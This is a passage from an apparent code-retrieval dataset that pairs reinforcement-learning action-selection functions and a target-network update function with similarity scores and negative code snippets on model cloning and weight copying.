self.robot_action_pub.publish(robot_action)", "def act(self,observation):\n maximum_actions = np.argwhere(self.q_table[observation] == np.amax(self.q_table[observation])).flatten()\n return(np.random.choice(maximum_actions))", "def choose_action(self, agent_data):\r\n action_value_estimates = agent_data[\"action_value_estimates\"]\r\n roll = random.uniform(0,1)\r\n if roll <= self.epsilon:\r\n action = random.choice( list( range(0,len(action_value_estimates))))\r\n else:\r\n action = self.argmax_with_random_tiebreaker(action_value_estimates)\r\n return action", "def select_action(self, q_values):\n assert q_values.ndim == 1\n q_values = q_values.astype('float64')\n nb_actions = q_values.shape[0]\n\n exp_values = np.exp(np.clip(q_values / self.tau, self.clip[0], self.clip[1]))\n probs = exp_values / np.sum(exp_values)\n action = np.random.choice(range(nb_actions), p=probs)\n log.info(f\"Chosen action by keras-rl {action} - probabilities: {probs}\")\n return action", "def choose_action(self, board):\n options = board.empty_cells\n # to allow exploration, have a small probability of a random move\n p_random = random.random()\n # if the state is not in the table add it\n if (self.sign, board.state) not in self.Q_table.keys() or p_random < self.epsilon:\n values = {}\n for option in options:\n values[option] = random.random()\n self.Q_table[(self.sign, board.state)] = values\n self.action = random.choice(options)\n else:\n values = self.Q_table[(self.sign, board.state)]\n action = max(values, key=values.get)\n self.action = action\n\n # decrease exploration after each action\n if self.epsilon > 0:\n self.epsilon -= 0.0001\n\n return self.action", "def actionSelector(self): \n if self.Temp!=0:\n if len(self.lessons) > 60 and self.var_T: \n # if the agent haven't already gotten food since a certain 
time \n # we increase the temperature by 0.001 \n if self.count_without_food>12:\n self.Temp += 0.01 \n if self.Temp>=(self.var_T[0]): \n self.Temp = self.var_T[0] \n # otherwise we decrease the temperatur by 0.001 \n else: \n self.Temp -= 0.001\n if self.Temp <= (self.var_T[-1]):\n self.Temp = self.var_T[-1]\n \n s = np.sum([np.exp(float(k)/self.Temp) for k in self.U_list])\n\n self.action_proba =[np.exp(float(m)/self.Temp)/s for m in self.U_list]\n action = np.random.choice(np.arange(4),p=self.action_proba) # choice a random choice relating to the probability distribution given by the softmax algorith \n else:\n action = np.argmax(self.U_list)\n return action", "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n if len(legalActions) == 0:\n return None\n elif util.flipCoin(self.epsilon):\n return random.choice(legalActions)\n else:\n return self.getPolicy(state)", "def choose_action(self, state):\n if random.random() < self.explore:\n action = random.choice(list(self.Q[state].keys()))\n else:\n action = self._best_action(state)\n\n # learn from the previous action, if there was one\n self._learn(state)\n\n # remember this state and action\n self.prev = (state, action)\n\n return action", "def select_action(self, state, epsilon=None):\n if epsilon == None:\n epsilon = self.epsilon\n \n if np.random.random() > epsilon:\n # greedy action selection\n return self.get_optimal_action(state)\n \n else:\n # random action selection\n return np.random.randint(0, self.num_actions)", "def choose_action(self, game_state):\n util.raise_not_defined()", "def choose_action(q_table: np.ndarray, state: int,\n exploration_rate: float) -> int:\n random_value = random.uniform(0, 1)\n if random_value > exploration_rate:\n action = best_action(q_table, state)\n else:\n num_actions = q_table.shape[1]\n action = random.randint(0, num_actions-1)\n return action", "def select_action(engine, observation):\n with torch.no_grad():\n dqn.eval()\n if torch.rand(1).item() < epsilon:\n return random_action(observation)\n else:\n return dqn(observation).greedy()", "def takeAction(self, state):\n # go greedy or not?\n if random.uniform(0, 1) < self.epsilon:\n # greedy selection\n # find best action\n allActions = torch.stack(\n tuple(torch.cat((state.strengths, state.focus, changes)) for changes in self.actionSet))\n evaluation = self.q.evaluateBunch(allActions)\n action = Action(state, self.actionSet[evaluation.argmax()])\n return action\n else:\n # random selection\n return Action(state, random.choice(self.actionSet))", "def pick_action(self, observation):\n if np.random.rand() < self.epsilon:\n action = np.random.randint(self.n_arm) # 从n个arm中随机选择一个\n else: # 1-epsilon greedy\n # 所谓reward, 就是success平均值\n posterior_means = self.get_posterior_mean() # shape:[arm, 1], 从中选择一个reward最大的arm\n action = random_argmax(posterior_means)\n\n return action", "def action_space_sample(self):\n return np.random.choice(self.possible_actions)", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < 
pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def obtain_action(self, timestep):\r\n\t\treturn random.randint(0, self.num_actions-1)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n opIndices = self.getOpponents(gameState)\n opStates = [gameState.getAgentState(i) for i in opIndices]\n opCarry = [x.numCarrying for x in opStates]\n \n if max(opCarry) >= 5:\n self.isOffensive = False\n else:\n self.isOffensive = True\n\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n\n\n # print if get eaten\n myPos = gameState.getAgentPosition(self.index)\n prevGameState = self.getPreviousObservation()\n if prevGameState is not None:\n\n previousPos = prevGameState.getAgentPosition(self.index)\n if self.getMazeDistance(myPos, previousPos) > 1:\n print(\"prePostion\",previousPos)\n print()\n previousLegalAction = prevGameState.getLegalActions(self.index)\n print([(self.evaluate(prevGameState, a), a) for a in previousLegalAction])\n print()\n print(self.getNonScaredGhostPos(prevGameState))\n print()\n print()\n\n\n return random.choice(bestActions)", "def __call__(self, state, q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]" ]
[ "0.7818525", "0.77571136", "0.7665768", "0.76560175", "0.7534476", "0.7534476", "0.7523864", "0.750895", "0.750895", "0.7486864", "0.74745595", "0.74528134", "0.7383261", "0.7376664", "0.7366769", "0.73616487", "0.732289", "0.73151815", "0.7300658", "0.72869414", "0.72837925", "0.72723657", "0.72645056", "0.72593266", "0.72425556", "0.7240141", "0.7240141", "0.7225282", "0.72009397", "0.71916306", "0.7188073", "0.71788627", "0.7169325", "0.7166236", "0.7138948", "0.712279", "0.7118252", "0.71179426", "0.71109265", "0.70955706", "0.7051368", "0.7049614", "0.7031613", "0.7014944", "0.69872606", "0.69861925", "0.6963253", "0.6962935", "0.69480366", "0.6940143", "0.69376624", "0.6937322", "0.6923691", "0.69222194", "0.6910532", "0.69093573", "0.6907853", "0.6899498", "0.6883045", "0.68811685", "0.6873736", "0.6856543", "0.6852671", "0.68509996", "0.68189394", "0.6789621", "0.6772299", "0.6744871", "0.674378", "0.674264", "0.67426205", "0.6741289", "0.67317617", "0.67304605", "0.6727009", "0.67241234", "0.67085814", "0.67034686", "0.6695554", "0.6693656", "0.6691104", "0.66864604", "0.6686382", "0.6683038", "0.66725206", "0.6671215", "0.66661584", "0.6659483", "0.6657348", "0.665007", "0.66390526", "0.663864", "0.6632994", "0.66326165", "0.66298074", "0.6625559", "0.66239756", "0.6612138", "0.66105", "0.6609644" ]
0.7174809
32
Clone structure and weights and compile
def update_target_network(self):
    self.target_Qmodel = clone_model(self.Qmodel)
    self.target_Qmodel.set_weights(self.Qmodel.get_weights())
    # target network is never compiled
    self.target_Qmodel.compile(loss='mse', optimizer=Adam())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def meta_clone(self, include_buffers=False):\n if include_buffers:\n self.buffers_clone = {k: v.data.clone()\n for k, v in self.named_buffers()}\n self.params_clone = {k: v.data.clone()\n for k, v in self.named_parameters()}\n self.grad_clone = {k: torch.zeros_like(v.data)\n for k, v in self.named_parameters()}\n self.grad_count = 0", "def copy(self):\n copyPreprocessors = []\n copyModels = []\n try:\n #package is defined here once and passed to _cloneObject.\n #When further modules are required, further imports will be necessary\n moduleObject = {\"sklearn\": importlib.import_module(\"sklearn.base\")}\n except(ImportError):\n moduleObject = None\n for preprocessor in self.preprocessors:\n copyPrep = self._cloneObject(preprocessor, moduleObject=moduleObject)\n copyPreprocessors.append(copyPrep)\n\n for model in self.models:\n copyModel = self._cloneObject(model, moduleObject=moduleObject)\n copyModels.append(copyModel)\n return Layer(models=copyModels, preprocessors=copyPreprocessors)", "def __init__(self, structure):\n # weight matrices\n self.ws = [np.random.randn(m, n) for n, m in zip([0] + structure, structure)]\n # biases\n self.bs = [np.random.rand(n, 1) for n in structure]\n # activations\n self.ys = [np.zeros((n, 1)) for n in structure]\n # z values\n self.zs = [np.zeros((n, 1)) for n in structure]", "def __copy__(self):\n #new = MCTS(copy=True) # don't run _predict() twice\n new = MCTS(self.env, copy=True) # don't set pi and Q twice\n new.env = self.env.__copy__()\n # can't use __dict__.update() without effecting env __copy__()\n # in theory, you don't need to copy the env. just use one copy for simulating, and restore it to root\n # since _Q() evaluates the env.done() of children, you need self.done = env.done() in __init__()\n # same for env.winner\n new.pi = []\n new. Q = 0\n new.net = self.net\n new.t = self.t\n new.expl = self.expl\n new.children = []\n new.parent = None\n return new", "def mutate(self):\n \n # Mutate each weight\n self.w1 = self.w1 + np.random.normal(0, 1, 8).reshape((2,4))\n self.b1 = self.b1 + np.random.normal(0, 1, 2).reshape((2,1))\n self.w2 = self.w2 + np.random.normal(0, 1, 4).reshape((2,2))\n self.b2 = self.b2 + np.random.normal(0, 1, 2).reshape((2,1))\n self.w3 = self.w3 + np.random.normal(0, 1, 2).reshape((1,2))\n self.b3 = self.b3 + np.random.normal(0, 1, 1)\n \n # Return thyself\n return self", "def copy(self):\n model_copy = BayesianModel()\n model_copy.add_nodes_from(self.nodes())\n model_copy.add_edges_from(self.edges())\n if self.cpds:\n model_copy.add_cpds(*[cpd.copy() for cpd in self.cpds])\n return model_copy", "def clone(self):", "def __init__(self, structure, weights = [], activationType = \"sigmoid\"):\n self.weights = []\n self.activationType = activationType\n self.activations = []\n self.derivatives = []\n self.delta = []\n self.bias = []\n\n #Either randomises weights or uses starting weights that have been supplied. \n for i in range(len(structure)-1):\n if len(weights) != 0:\n w = np.zeros((structure[i], structure[i + 1]))\n for j in range(structure[i]):\n w[j, :] = weights[(j * structure[i + 1]) : (j * structure[i + 1]) + structure[i + 1]]\n else:\n w = np.random.rand(structure[i], structure[i + 1])\n self.weights.append(w)\n \n #Initialises activations array, delta array and bias array. 
\n for i in range(len(structure)):\n a = np.zeros(structure[i])\n self.activations.append(a)\n self.delta.append(a)\n self.bias.append(a)\n \n \n #Initialises derivatives array.\n for i in range(len(structure) - 1):\n d = np.zeros((structure[i], structure[i + 1]))\n self.derivatives.append(d)\n \n return", "def copy(self, shareWeights):\n newNode = SparseLinear(self.inputDim, self.outputDim, self.stdv)\n #newNode.receiveGradFrom = self.receiveGradFrom[:]\n #newNode.receiveInputFrom = self.receiveInputFrom[:]\n if shareWeights:\n newNode.weight = self.weight\n newNode.gradWeight = self.gradWeight\n newNode.bias = self.bias\n newNode.gradBias = self.gradBias\n return newNode", "def compile(self):\n self.train = self._make_train()\n self.loss_test = self._make_loss_test()\n self.predict = self._make_predict()", "def build(self):\n\n self.W_AA = self.init([self.n_atom_input_feat, self.n_hidden_AA])\n self.b_AA = model_ops.zeros(shape=[\n self.n_hidden_AA,\n ])\n\n self.W_PA = self.init([self.n_pair_input_feat, self.n_hidden_PA])\n self.b_PA = model_ops.zeros(shape=[\n self.n_hidden_PA,\n ])\n\n self.W_A = self.init([self.n_hidden_A, self.n_atom_output_feat])\n self.b_A = model_ops.zeros(shape=[\n self.n_atom_output_feat,\n ])\n\n self.trainable_weights = [\n self.W_AA, self.b_AA, self.W_PA, self.b_PA, self.W_A, self.b_A\n ]\n if self.update_pair:\n self.W_AP = self.init([self.n_atom_input_feat * 2, self.n_hidden_AP])\n self.b_AP = model_ops.zeros(shape=[\n self.n_hidden_AP,\n ])\n\n self.W_PP = self.init([self.n_pair_input_feat, self.n_hidden_PP])\n self.b_PP = model_ops.zeros(shape=[\n self.n_hidden_PP,\n ])\n\n self.W_P = self.init([self.n_hidden_P, self.n_pair_output_feat])\n self.b_P = model_ops.zeros(shape=[\n self.n_pair_output_feat,\n ])\n\n self.trainable_weights.extend(\n [self.W_AP, self.b_AP, self.W_PP, self.b_PP, self.W_P, self.b_P])", "def copy(self):\n brain = Brain((self.structure), activation_function=self.activation_function)\n brain.weights = copy.deepcopy(self.weights)\n brain.biases = copy.deepcopy(self.biases)", "def build(self):\n\n self.W = self.init([self.n_atom_input_feat, self.n_output])\n self.b = model_ops.zeros(shape=[\n self.n_output,\n ])\n\n self.trainable_weights = self.W + self.b", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def test_BuildModel1(self):\n print(\"\\nTest 5: Building a Model with cloning\")\n builder = StaticBuilder(\"Clone\")\n in1 = builder.addInput(10)\n enc1 = builder.addInner(3)\n out1 = builder.addOutput(name=\"Out1\")\n out2 = builder.addOutput(name=\"Out2\")\n \n builder.addDirectedLink(in1, enc1)\n builder.addDirectedLink(enc1, out1)\n builder.addDirectedLink(enc1, out2)\n \n builder.build()", "def init_structure(self):\n dest = os.path.join(self.cwd, 'build', 'debian')\n self.mkdir_p(dest)\n struct = os.path.join(dest, self.cwd)\n self.mkdir_p(struct)\n# copytree_src = os.path.join(self.cwd, 'DEBIAN')\n# self.copytree(copytree_src, dest, symlinks=False, ignore=None)\n\n new_dest = os.path.join(dest, self.cwd[1:])\n self.copytree(\n self.cwd,\n new_dest,\n symlinks=False,\n ignore=self.ignore\n )", "def copy(self):\n model = LBM(\n n_row_clusters=self.n_row_clusters,\n n_column_clusters=self.n_column_clusters,\n max_iter=self.max_iter,\n n_init=self.n_init,\n n_init_total_run=self.n_init_total_run,\n n_iter_early_stop=self.nb_iter_early_stop,\n rtol=self.rtol,\n atol=self.atol,\n 
verbosity=self.verbosity,\n use_gpu=self.use_gpu,\n gpu_index=self.gpu_index,\n )\n model._nb_rows = self._nb_rows\n model._nb_cols = self._nb_cols\n model.loglikelihood_ = self.loglikelihood_\n model._np = self._np\n model._cupyx = self._cupyx\n model.trained_successfully_ = self.trained_successfully_\n model.pi_ = copy.copy(self.pi_)\n model.alpha_1_ = copy.copy(self.alpha_1_)\n model.alpha_2_ = copy.copy(self.alpha_2_)\n model.tau_1_ = copy.copy(self.tau_1_)\n model.tau_2_ = copy.copy(self.tau_2_)\n return model", "def copy(self):\n new = self.__class__()\n do_not_copy_by_ref = {\"alleles\", \"strains\", \"base_cobra_model\", \"notes\",\n \"annotation\"}\n for attr in self.__dict__:\n if attr not in do_not_copy_by_ref:\n new.__dict__[attr] = self.__dict__[attr]\n new.notes = deepcopy(self.notes)\n new.annotation = deepcopy(self.annotation)\n\n new.alleles = DictList()\n do_not_copy_by_ref = {\"_strains\", \"_model\"}\n for allele in self.alleles:\n new_allele = allele.__class__()\n for attr, value in iteritems(allele.__dict__):\n if attr not in do_not_copy_by_ref:\n new_allele.__dict__[attr] = copy(\n value) if attr == \"formula\" else value\n new_allele._model = new\n new.alleles.append(new_allele)\n\n new.strains = DictList()\n do_not_copy_by_ref = {\"_model\", \"_alleles\", \"_base_cobra_model\"}\n for strain in self.strains:\n new_strain = strain.__class__()\n for attr, value in iteritems(strain.__dict__):\n if attr not in do_not_copy_by_ref:\n new_strain.__dict__[attr] = copy(value)\n new_strain._model = new\n new.strains.append(new_strain)\n # update awareness\n for allele, stoic in iteritems(strain._alleles):\n new_allele = new.alleles.get_by_id(allele.id)\n new_strain._alleles[new_allele] = stoic\n new_allele._strain.add(new_strain)\n # it doesn't make sense to retain the context of a copied model so\n # assign a new empty context\n new._contexts = list()", "def _use_copy(self):\n self.mx_states = (\n [] if not self.copy_states else [self.ocp.nlp[self.nlp.use_states_from_phase_idx].states[0][self.name].mx]\n )\n self.mx_states_dot = (\n []\n if not self.copy_states_dot\n else [self.ocp.nlp[self.nlp.use_states_dot_from_phase_idx].states_dot[0][self.name].mx]\n )\n self.mx_controls = (\n []\n if not self.copy_controls\n else [self.ocp.nlp[self.nlp.use_controls_from_phase_idx].controls[0][self.name].mx]\n )\n self.mx_stochastic = []\n\n # todo: if mapping on variables, what do we do with mapping on the nodes\n for i in self.nlp.variable_mappings[self.name].to_second.map_idx:\n var_name = (\n f\"{'-' if np.sign(i) < 0 else ''}{self.name}_{self.name_elements[abs(i)]}_MX\"\n if i is not None\n else \"zero\"\n )\n\n if not self.copy_states:\n self.mx_states.append(MX.sym(var_name, 1, 1))\n\n if not self.copy_states_dot:\n self.mx_states_dot.append(MX.sym(var_name, 1, 1))\n\n if not self.copy_controls:\n self.mx_controls.append(MX.sym(var_name, 1, 1))\n\n self.mx_stochastic.append(MX.sym(var_name, 1, 1))\n\n self.mx_states = vertcat(*self.mx_states)\n self.mx_states_dot = vertcat(*self.mx_states_dot)\n self.mx_controls = vertcat(*self.mx_controls)\n self.mx_stochastic = vertcat(*self.mx_stochastic)", "def clone(self):\n cloned_self = BlockMovementEnv(self.config, self.speed, name = self.name, \n progress_estimator = self.progress_estimator, graph_size = self.graph_size, \n session = self.session, reset = False)\n for o in self.start_config:\n cloned_self.add_object(o)\n\n for object_index, _, next_transform, _, _, _, action_means, action_stds in self.action_storage: \n action = 
(object_index, next_transform.get_feat(), action_means, action_stds)\n cloned_self.step(action)\n\n return cloned_self", "def __deepcopy__(self, memodict={}):\n return Node(deepcopy(self.location), self.weight)", "def deep_copy(self):\n return self.__class__(self.inputs, self.outputs, self.middle)", "def copy(self):\n new_model = Model(\n name=self.name,\n functions=copy.deepcopy(self.functions),\n domain=self.domain.copy(),\n density=self.density.copy(),\n )\n new_model.update()\n\n return new_model", "def deepcopy(self):\r\n newNN = NeuralNetwork(self.max_epochs, self.loss, self.metric, self.momentum_rate,\r\n self.regularization_rate, self.type, self.batch_size, self.type_classifier)\r\n [newNN.add_layer(layer.deepcopy()) for layer in self.layers]\r\n return newNN", "def clone(self, clone=None):\r\n # copy specs from supplied object\r\n if clone is not None: [setattr(self, v, getattr(clone, v)) for v in vars(clone)]", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def copy_weights(self):\n return copy.deepcopy(self.weights_ih), copy.deepcopy(self.weights_ho)", "def clone(self, **kwargs):\n return attr.evolve(self, **kwargs)", "def __init__(self, weights:np.ndarray):\n self.w = weights.copy()", "def compile(self):\n self.model = compile_model(self.model_filename, include_paths = self.include_paths)\n self.simulation = compile_model(self.sim_filename, include_paths = self.include_paths)", "def clone(self):\n # make copies of my state\n beta = self.beta\n theta = self.theta.clone()\n sigma = self.sigma.clone()\n likelihoods = self.prior.clone(), self.data.clone(), self.posterior.clone()\n\n # make one and return it\n return type(self)(beta=beta, theta=theta, likelihoods=likelihoods, sigma=sigma)", "def copy(self):\n new_ann = ForwardArtificialNeuralNectwork(self.dim_in-1, self.dim_hid, self.dim_out)\n new_ann.weight[:,:] = self.weight\n new_ann.connectivity[:,:] = self.connectivity\n new_ann.hidden[:] = self.hidden\n return new_ann", "def build(self,input_shape):\n\n self.w = self.add_weight(shape=(input_shape[-1],self.units),\n initializer='random_normal',\n trainable=True)\n self.b = self.add_weight(shape=(self.units,),\n initializer='random_normal',\n trainable=True)", "def clone(self):\n return _libsbml.FbcAnd_clone(self)", "def __copy__(self) :\n return self.build(self.scope.copy(), self.scope_vids.copy(), np.array(self.table))", "def __deepcopy__(self, memodict={}):\n nodes = [deepcopy(n) for n in self.nodes]\n return Network(nodes)", "def clone(self):\n raise NotImplementedError", "def clone(self, first_order=None, allow_unused=None, allow_nograd=None):\n if first_order is None:\n first_order = self.first_order\n if allow_unused is None:\n allow_unused = self.allow_unused\n if allow_nograd is None:\n allow_nograd = self.allow_nograd\n return MAMLpp(\n clone_module(self.module),\n lr=self.lr,\n lrs=clone_named_parameters(self.lrs),\n first_order=first_order,\n allow_unused=allow_unused,\n allow_nograd=allow_nograd,\n )", "def copy(self):\r\n clone = NeuralNetLayer(self.input_size, self.output_size)\r\n clone.weights = self.weights.copy()\r\n return clone", "def clone(self):\n return attr.evolve(self)", "def clone(self):\n return attr.evolve(self, env=dict(self._env))", "def clone(self):\r\n cp = self.__class__(self.op, self.inputs, [output.clone() for output in self.outputs])\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\r\n clone = NeuralNet()\r\n for layer in self.layers:\r\n clone.layers.append(layer.copy())\r\n return clone", 
"def test_deepcopy(self):\n t = Compose([Enumerate([2, \"asfa\", \"ipsi\"]), OneHotEncode(3)], \"categorical\")\n t.transform([2])\n copy.deepcopy(t)", "def copy_para(from_model, to_model):\n for i, j in zip(from_model.trainable_weights, to_model.trainable_weights):\n j.assign(i)", "def __deepcopy__(self, memo):\r\n new_inst = super().__deepcopy__(memo)\r\n new_inst.road_width = self.road_width\r\n new_inst.road_length = self.road_length\r\n new_inst.surface = self.surface\r\n \r\n return new_inst", "def constructCell():\n\t\tself.weightGenerate()", "def clone(self):\n sc=copy.copy(self)\n sc.farms=list()\n for f in self.farms:\n sc.farms.append(f.clone(f.name, f.size))\n sc.airborne=list()\n for a in self.airborne:\n sc.airborne.append(a.clone(a.farma, a.farmb, a.distance))\n return sc", "def hard_copy_weights(self, target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)", "def __init__(self, weights, path, trained, asGraph):\n \n _weights = np.asarray(weights)\n\n numLayers = int(_weights.shape[0]/2)\n wghts = []\n biases = []\n\n for i in range(numLayers):\n j = 2*i\n# print(j,(_weights[j].T).shape)\n wghts.append(_weights[j])\n j = 2*i + 1\n# print(j,(_weights[j].T).shape)\n biases.append(_weights[j])\n #enddo\n\n self.numLayers = numLayers\n self.wghts = np.asarray(wghts)\n self.asGraph = asGraph\n self.wghts = wghts\n self.path = path\n self.trained = trained", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def prepare_weights(self, hs, negative, wv, docvecs, update=False):\n # set initial input/projection and hidden weights\n if not update:\n self.reset_weights(hs, negative, wv, docvecs)\n else:\n self.update_weights(hs, negative, wv)", "def build(self, weight = 0.5):\n \n self.weight = weight\n \n # Defining weighting matrixes\n self.processing_fw = torch.randn((self._hidden_size, self._expansion_size), requires_grad = True).to(self.device)\n self.processing_bw = torch.randn((self._hidden_size, self._expansion_size), requires_grad = True).to(self.device)\n self.processing_last_ht = torch.randn((self._hidden_size*2, self._hidden_size*2), requires_grad = True).to(self.device)\n \n # These will only be applied to the intermediate hidden states\n self.linear_fw = nn.Linear(self._seqlen - 1, 1).to(self.device)\n self.linear_bw = nn.Linear(self._seqlen - 1, 1).to(self.device)\n \n self.compression = torch.randn((self._expansion_size*2, self._hidden_size*2), requires_grad = True).to(self.device)\n \n if self._activation_fn == 'tanh' or isinstance(self._activation_fn, torch.nn.modules.activation.Tanh):\n self._activation_fn = nn.Tanh()\n elif self._activation_fn == 'sigmoid' or isinstance(self._activation_fn, torch.nn.modules.activation.Sigmoid):\n self._activation_fn = nn.Sigmoid()\n elif self._activation_fn == 'leaky ReLU' or isinstance(self._activation_fn, torch.nn.modules.activation.LeakyReLU):\n self._activation_fn = nn.LeakyReLU()\n else:\n raise ValueError('Non-linear activation function must be \"tanh\", \"sigmoid\" or \"leaky ReLU\"')\n \n # Passing it onto the relevant device\n self._activation_fn = self._activation_fn.to(self.device)", "def copyWeights(self, shp, stray = 0, colour = (240,100,100)):\n self.weights = []\n self.bias = []\n if(stray == 0): # straight copy\n for i, wt in enumerate(shp.weights):\n self.weights.append(wt.copy())\n for i,bs in enumerate(shp.bias):\n self.bias.append(bs.copy())\n else: # Copy with some random added in\n for i, wt in enumerate(shp.weights):\n 
self.weights.append(np.add(wt.copy(), np.random.normal(0,stray,(shp.dimensions[i],shp.dimensions[i+1]))))\n for i,bs in enumerate(shp.bias):\n self.bias.append(np.add(bs.copy(), np.random.normal(0,stray,shp.dimensions[i+1])))\n self.normalizeWeights()\n self.colour = colour\n self.parentname = shp.name\n self.parentcolour = shp.colour\n self.setDimension(shp.inputdistance,shp.inputangle,shp.intermediates,shp.orders)", "def copy(self):\n edges, weights = [], []\n \n # This is a microoptimization\n edges_append = edges.append\n weights_append = weights.append\n \n for edge, weight in self.edges(and_weights=True):\n edges_append(edge)\n weights_append(weight)\n \n return type(self)(edges, weights)", "def DontuseThis():\n BCM_outputs = ['phi','rho','theta',\n 'r_probabilityMaps','l_probabilityMaps',\n 'models']\n BCM_Models = pe.Node(interface=nio.DataGrabber(input_names=['structures'],\n outfields=BCM_outputs),\n name='10_BCM_Models')\n BCM_Models.inputs.base_directory = atlas_fname_wpath\n BCM_Models.inputs.template_args['phi'] = [['spatialImages','phi','nii.gz']]\n BCM_Models.inputs.template_args['rho'] = [['spatialImages','rho','nii.gz']]\n BCM_Models.inputs.template_args['theta'] = [['spatialImages','theta','nii.gz']]\n BCM_Models.inputs.template_args['r_probabilityMaps'] = [['structures']]\n BCM_Models.inputs.template_args['l_probabilityMaps'] = [['structures']]\n BCM_Models.inputs.template_args['models'] = [['structures']]\n\n BRAINSCut_structures = ['caudate','thalamus','putamen','hippocampus']\n #BRAINSCut_structures = ['caudate','thalamus']\n BCM_Models.iterables = ( 'structures', BRAINSCut_structures )\n BCM_Models.inputs.template = '%s/%s.%s'\n BCM_Models.inputs.field_template = dict(\n r_probabilityMaps='probabilityMaps/r_%s_ProbabilityMap.nii.gz',\n l_probabilityMaps='probabilityMaps/l_%s_ProbabilityMap.nii.gz',\n models='modelFiles/%sModel*',\n )\n\n \"\"\"\n The xml creation and BRAINSCut need to be their own mini-pipeline that gets\n executed once for each of the structures in BRAINSCut_structures. 
This can be\n accomplished with a map node and a new pipeline.\n \"\"\"\n \"\"\"\n Create xml file for BRAINSCut\n \"\"\"\n\n\n BFitAtlasToSubject = pe.Node(interface=BRAINSFit(),name=\"BFitAtlasToSubject\")\n BFitAtlasToSubject.inputs.costMetric=\"MMI\"\n BFitAtlasToSubject.inputs.maskProcessingMode=\"ROI\"\n BFitAtlasToSubject.inputs.numberOfSamples=100000\n BFitAtlasToSubject.inputs.numberOfIterations=[1500,1500]\n BFitAtlasToSubject.inputs.numberOfHistogramBins=50\n BFitAtlasToSubject.inputs.maximumStepLength=0.2\n BFitAtlasToSubject.inputs.minimumStepLength=[0.005,0.005]\n BFitAtlasToSubject.inputs.transformType= [\"Affine\",\"BSpline\"]\n BFitAtlasToSubject.inputs.maxBSplineDisplacement= 7\n BFitAtlasToSubject.inputs.maskInferiorCutOffFromCenter=65\n BFitAtlasToSubject.inputs.splineGridSize=[28,20,24]\n BFitAtlasToSubject.inputs.outputVolume=\"Trial_Initializer_Output.nii.gz\"\n BFitAtlasToSubject.inputs.outputTransform=\"Trial_Initializer_Output.mat\"\n cutWF.connect(SplitAvgBABC,'avgBABCT1',BFitAtlasToSubject,'fixedVolume')\n cutWF.connect(BABC,'outputLabels',BFitAtlasToSubject,'fixedBinaryVolume')\n cutWF.connect(BAtlas,'template_t1',BFitAtlasToSubject,'movingVolume')\n cutWF.connect(BAtlas,'template_brain',BFitAtlasToSubject,'movingBinaryVolume')\n cutWF.connect(BLI,'outputTransformFilename',BFitAtlasToSubject,'initialTransform')\n\n CreateBRAINSCutXML = pe.Node(Function(input_names=['rho','phi','theta',\n 'model',\n 'r_probabilityMap',\n 'l_probabilityMap',\n 'atlasT1','atlasBrain',\n 'subjT1','subjT2',\n 'subjT1GAD','subjT2GAD',\n 'subjSGGAD','subjBrain',\n 'atlasToSubj','output_dir'],\n output_names=['xml_filename','rl_structure_filename_list'],\n function = create_BRAINSCut_XML),\n overwrite = True,\n name=\"CreateBRAINSCutXML\")\n\n ## HACK Makde better directory\n CreateBRAINSCutXML.inputs.output_dir = \".\" #os.path.join(cutWF.base_dir, \"BRAINSCut_output\")\n cutWF.connect(BCM_Models,'models',CreateBRAINSCutXML,'model')\n cutWF.connect(BCM_Models,'rho',CreateBRAINSCutXML,'rho')\n cutWF.connect(BCM_Models,'phi',CreateBRAINSCutXML,'phi')\n cutWF.connect(BCM_Models,'theta',CreateBRAINSCutXML,'theta')\n cutWF.connect(BCM_Models,'r_probabilityMaps',CreateBRAINSCutXML,'r_probabilityMap')\n cutWF.connect(BCM_Models,'l_probabilityMaps',CreateBRAINSCutXML,'l_probabilityMap')\n cutWF.connect(BAtlas,'template_t1',CreateBRAINSCutXML,'atlasT1')\n cutWF.connect(BAtlas,'template_brain',CreateBRAINSCutXML,'atlasBrain')\n cutWF.connect(SplitAvgBABC,'avgBABCT1',CreateBRAINSCutXML,'subjT1')\n cutWF.connect(SplitAvgBABC,'avgBABCT2',CreateBRAINSCutXML,'subjT2')\n cutWF.connect(GADT1,'outputVolume',CreateBRAINSCutXML,'subjT1GAD')\n 